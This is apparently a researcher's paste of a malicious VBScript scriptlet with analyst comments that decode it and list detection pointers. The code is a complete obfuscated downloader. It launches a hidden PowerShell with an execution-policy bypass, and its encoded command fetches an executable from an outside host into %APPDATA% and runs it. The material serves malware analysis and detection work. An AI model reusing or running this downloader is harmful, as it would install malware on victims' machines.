James_inthe_box

Scriptlet

Dec 1st, 2017
  1. <?XML version="1.0"?>
  2. <scriptlet>
  <!-- Registration metadata for the scriptlet's COM component.
       The description and progid values look machine-generated rather than
       meaningful, so they (and the classid) may be unique to this sample;
       treat them as weak indicators unless they recur across samples.
       remotable="true" is set on the registration. How the scriptlet is
       delivered and loaded is not shown on this page. -->
  3. <registration
  4. description="g3FqiZ30ATtgS3XaE71WMVZQMPJwqdVqA97QgJJgm7tas"
  5. progid="aXy.bj5"
  6. version="1.0"
  7. classid="{1AE493A0-8E8F-4786-8468-3C903D89344C}"
  8. remotable="true"
  9. >
  10. </registration>
  11. <script language="VBScript">
  12. <![CDATA[
  ' Top-level downloader logic. It runs only when veFN8o() returns False.
  ' Paste line 14 is a single statement chain; the page shows it wrapped onto
  ' a second physical line (the one starting with "& CHr ( 32 )").
  '
  ' Analyst notes (decoded from the literals below):
  '  - Every string is assembled one character at a time with Chr/ChrW, and
  '    StrReverse is applied to single characters, where it changes nothing;
  '    it only breaks up static string matching.
  '  - The CreateObject argument decodes to "WSCriPT.SHell".
  '  - The ExpandEnvironmentStrings argument decodes to "%sySTEMRooT%", and the
  '    suffix appended to it decodes to
  '    "\SysTeM32\WinDOWsPOWErshElL\V1.0\PowErShELL.ExE".
  '  - ZEJoCzDboBZvyj holds a nested PowerShell command line that is passed to
  '    that binary as one quoted argument: -Ex BYpass (execution policy),
  '    -nOp (no profile), -w hIDDeN (hidden window), -ec (Base64 of a UTF-16LE
  '    command).
  '  - The -ec blob decodes to a System.Net.WebClient DownloadFile call that
  '    fetches hxxp://5miles[.]com[.]sg/libraries/phputf8/mbstring/fadaa[.]exe
  '    (defanged here) to $env:APPDATA\home.exe, followed by Start on that file.
  '    The decoded command uses U+201D curly quotes and tab separators.
  '  - Run is called with window style 0 (hidden) and no wait argument, then the
  '    shell object is released.
  '
  ' Detection and triage pointers grounded in the above:
  '  - process creation of powershell.exe whose command line combines an
  '    encoded command with a hidden window and an execution-policy bypass;
  '  - creation and execution of home.exe directly under %APPDATA%;
  '  - outbound HTTP to the host named above.
  ' The parent process depends on whatever host loads the scriptlet, which this
  ' page does not show.
  13. if not veFN8o then
  14. dIm zkDXBZOXcrrFmu : dIM ZEJoCzDboBZvyj : sEt zkDXBZOXcrrFmu = cReateOBjECT ( ChrW(&H57) & StrReverse(Chr(&H53)) & StrReverse(ChrW(&H43)) & ChrW(&H72) & StrReverse(Chr(&H69)) & StrReverse(Chr(&H50)) & StrReverse(ChrW(&H54)) & StrReverse(Chr(&H2E)) & StrReverse(ChrW(&H53)) & Chr(&H48) & ChrW(&H65) & StrReverse(Chr(&H6C)) & StrReverse(ChrW(&H6C)) ) : ZEJoCzDboBZvyj = " pOwerShEll.exE -Ex BYpass -nOp -w hIDDeN -ec CQAoAG4AZQBXAC0AbwBCAGoARQBDAFQAIABzAHkAcwBUAGUAbQAuAE4AZQB0AC4AdwBlAEIAYwBMAEkARQBuAHQAKQAuAGQATwBXAE4AbABPAEEAZABGAEkAbABFACgACQAdIGgAdAB0AHAAOgAvAC8ANQBtAGkAbABlAHMALgBjAG8AbQAuAHMAZwAvAGwAaQBiAHIAYQByAGkAZQBzAC8AcABoAHAAdQB0AGYAOAAvAG0AYgBzAHQAcgBpAG4AZwAvAGYAYQBkAGEAYQAuAGUAeABlAB0gCQAsAAkAHSAkAGUAbgB2ADoAQQBQAHAARABhAFQAQQBcAGgAbwBtAGUALgBlAHgAZQAdIAkAKQAJADsACQBTAFQAQQByAFQACQAdICQAZQBOAHYAOgBhAFAAcABkAEEAVABBAFwAaABvAG0AZQAuAGUAeABlAB0g " : zkDXBZOXcrrFmu.ruN CHR ( 34 ) & zkDXBZOXcrrFmu.exPaNdeNVIroNmEntstRinGS( Chr(&H25) & StrReverse(Chr(&H73)) & StrReverse(ChrW(&H79)) & ChrW(&H53) & StrReverse(Chr(&H54)) & ChrW(&H45) & StrReverse(Chr(&H4D)) & StrReverse(Chr(&H52)) & StrReverse(ChrW(&H6F)) & ChrW(&H6F) & StrReverse(ChrW(&H54)) & StrReverse(Chr(&H25)) ) & StrReverse(ChrW(&H5C)) & ChrW(&H53) & ChrW(&H79) & StrReverse(Chr(&H73)) & ChrW(&H54) & ChrW(&H65) & StrReverse(ChrW(&H4D)) & ChrW(&H33) & ChrW(&H32) & Chr(&H5C) & Chr(&H57) & StrReverse(ChrW(&H69)) & StrReverse(ChrW(&H6E)) & Chr(&H44) & Chr(&H4F) & StrReverse(Chr(&H57)) & StrReverse(ChrW(&H73)) & Chr(&H50) & ChrW(&H4F) & StrReverse(Chr(&H57)) & ChrW(&H45) & Chr(&H72) & ChrW(&H73) & StrReverse(Chr(&H68)) & ChrW(&H45) & StrReverse(Chr(&H6C)) & ChrW(&H4C) & Chr(&H5C) & StrReverse(ChrW(&H56)) & StrReverse(ChrW(&H31)) & Chr(&H2E) & Chr(&H30) & StrReverse(Chr(&H5C)) & Chr(&H50) & StrReverse(ChrW(&H6F)) & Chr(&H77) & Chr(&H45) & Chr(&H52) & Chr(&H53) & Chr(&H68) & ChrW(&H45) & ChrW(&H4C) & Chr(&H4C) & StrReverse(ChrW(&H2E)) & StrReverse(ChrW(&H45)) & ChrW(&H58) & StrReverse(ChrW(&H45)) & CHr ( 34 ) 
& CHr ( 32 ) & Chr (34 ) & ZEJoCzDboBZvyj & cHr ( 34 ) , 0 : set zkDXBZOXcrrFmu = NoTHINg
  15. end if
  ' veFN8o: instance check used as the guard for the top-level block.
  ' Returns True when more than one running cscript.exe / wscript.exe process
  ' has a command line containing WScript.ScriptName; the caller negates the
  ' result, so the payload is skipped in that case. Presumably this is meant to
  ' stop a second concurrent copy from re-running the download; the intent is
  ' not stated in the sample.
  16. Function veFN8o
  17. Dim vLYABNGOT
  18. Dim vWi
  19. Dim vre
  ' WMI query against root\cimv2 on the local machine ("."). The flag value 48
  ' is wbemFlagReturnImmediately (16) + wbemFlagForwardOnly (32).
  ' The query itself is a fixed string and can be matched in WMI activity logs
  ' where those are collected.
  20. Set vLYABNGOT = GetObject("winmgmts:\\.\root\cimv2").ExecQuery( _
  21. "Select * from Win32_Process where Name='cscript.exe' or Name='wscript.exe'",,48)
  22. For Each vWi in vLYABNGOT
  ' The last Instr argument (1) selects a case-insensitive text comparison.
  23. If Instr(1, vWi.CommandLine, WScript.ScriptName, 1) > 0 Then
  ' vre is never initialised; an Empty variable counts as 0 in this addition.
  24. vre = vre + 1
  25. End If
  26. Next
  ' True only when at least two matching script-host processes were counted.
  27. veFN8o = (vre > 1)
  28. End Function
  29. ]]>
  30. </script>